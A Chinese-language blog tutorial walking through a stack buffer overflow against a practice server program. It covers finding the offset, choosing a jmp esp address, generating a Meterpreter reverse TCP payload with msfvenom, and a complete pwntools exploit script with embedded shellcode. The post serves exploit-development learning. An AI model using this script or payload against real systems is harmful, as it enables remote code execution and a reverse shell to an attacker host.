溢出提权上线

文章首发于火线：https://zone.huoxian.cn/d/858

初次尝试出也算是溢出的一次学习望师傅们指点

开始

测试程序server.exe
这个程序启动的时候会监听31337端口
连接这个端口后可以输入内容然后会输出hello xxx！

用kali先生成测试字符

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B

将生成的字符序列发送到server.exe监听的端口
先监听端口

telnet 10.150.127.36 31337

怎么找到监听的端口先看看服务的进程

然后netstat -ano | findstr “pid”

这里我们用的nc测试

这个时候程序就被破坏了

然后我们来到windows的日志查看来看看报错的偏移位置 0x39654138

然后用010editor看看偏移的位置这里需要先将传进去的字符串复制到txt

然后在里面来寻找偏移的位置0x39654138

找到了错误的便宜位置就将这里替换为jmp esp

随便选择一个 75172273

然后将后面的替换为shellcode 先用kali生成一段shellcode

然后复制到刚才的txt

然后保存将文件复制到kali 然后用nc 传进去
先把程序运行起来

这里报错了因为我是用的txt来写入写入的不上二进制字符应该是这样报错了

然后重新用脚本输入
先生成一段py格式的shellcode

命令：msfvenom -p windows/meterpreter/reverse_tcp lhost=10.150.127.130 lport=6688 -b “\x00\x0a\x0d” -f python

然后写脚本

from pwn import * import sys if len(sys.argv) < 3: print "Usage:() ip port".format(sys.argv[0]) sys.exit() ip = sys.argv[1] port = sys.argv[2] buf = b""buf += b"\xda\xd3\xd9\x74\x24\xf4\xb8\x34\x4d\x02\xd0\x5a\x33"buf += b"\xc9\xb1\x59\x31\x42\x19\x83\xc2\x04\x03\x42\x15\xd6"buf += b"\xb8\xfe\x38\x99\x43\xff\xb8\xc5\x72\x2d\xdc\x8e\x27"buf += b"\xe1\x96\xc2\xcb\x8a\xfb\xf6\x5a\x69\x70\x84\x74\x7d"buf += b"\x30\x22\xa3\xb0\xc1\x83\x6b\x1e\x01\x82\x17\x5d\x56"buf += b"\x64\x29\xae\xab\x65\x6e\x78\xc1\x8a\x22\x2c\xa2\x06"buf += b"\xd3\x59\xf6\x9a\xd2\x8d\x7c\xa2\xac\xa8\x43\x56\x01"buf += b"\xb2\x93\xc6\x12\xec\x33\xe7\xf7\x86\x7c\xff\x72\x51"buf += b"\x08\xc3\x35\xe9\xc5\xb0\xf7\x12\x24\x10\xc6\x2c\xe6"buf += b"\x53\x24\x01\xe8\xac\x0f\xb9\x9e\xc6\x73\x44\x99\x1d"buf += b"\x09\x92\x2c\x81\xa9\x51\x96\x65\x4b\xb5\x41\xee\x47"buf += b"\x72\x05\xa8\x4b\x85\xca\xc3\x70\x0e\xed\x03\xf1\x54"buf += b"\xca\x87\x59\x0e\x73\x9e\x07\xe1\x8c\xc0\xe0\x5e\x29"buf += b"\x8b\x03\x88\x4d\x74\xdc\xb5\x13\xe2\x10\x78\xac\xf2"buf += b"\x3e\x0b\xdf\xc0\xe1\xa7\x77\x68\x69\x6e\x8f\xf9\x7d"buf += b"\x91\x5f\x41\xed\x6f\x60\xb1\x27\xb4\x34\xe1\x5f\x1d"buf += b"\x35\x6a\xa0\xa2\xe0\x06\xaa\x34\x01\x40\xd5\x46\x7d"buf += b"\x6e\x2a\x5d\x5e\xe7\xcc\x31\xce\xa7\x40\xf2\xbe\x07"buf += b"\x31\x9a\xd4\x88\x6e\xba\xd6\x43\x07\x51\x39\x3d\x7f"buf += b"\xce\xa0\x64\x0b\x6f\x2c\xb3\x71\xaf\xa6\x31\x85\x7e"buf += b"\x4f\x30\x95\x97\x28\xba\x65\x68\xdd\xba\x0f\x6c\x77"buf += b"\xed\xa7\x6e\xae\xd9\x67\x90\x85\x5a\x6f\x6e\x58\x6a"buf += b"\x1b\x59\xce\xd2\x73\xa6\x1e\xd2\x83\xf0\x74\xd2\xeb"buf += b"\xa4\x2c\x81\x0e\xab\xf8\xb6\x82\x3e\x03\xee\x77\xe8"buf += b"\x6b\x0c\xa1\xde\x33\xef\x84\x5c\x33\x0f\x5a\x4b\x9c"buf += b"\x67\xa4\xcb\x1c\x77\xce\xcb\x4c\x1f\x05\xe3\x63\xef"buf += b"\xe6\x2e\x2c\x67\x6c\xbf\x9e\x16\x71\xea\x7f\x86\x72"buf += b"\x19\xa4\x39\x08\x52\x5b\xba\xed\x7a\x38\xbb\xed\x82"buf += b"\x3e\x80\x3b\xbb\x34\xc7\xff\xf8\x47\x72\x5d\xa8\xcd"buf += b"\x7c\xf1\xaa\xc7"payload = b"A"*146+b"\xEB\x3C\xA5\x74"+b"\x90"*10+buf r = remote(ip,port) r.sendline(payload)

这里是146的原因是偏移了多少个字符这里可以数出来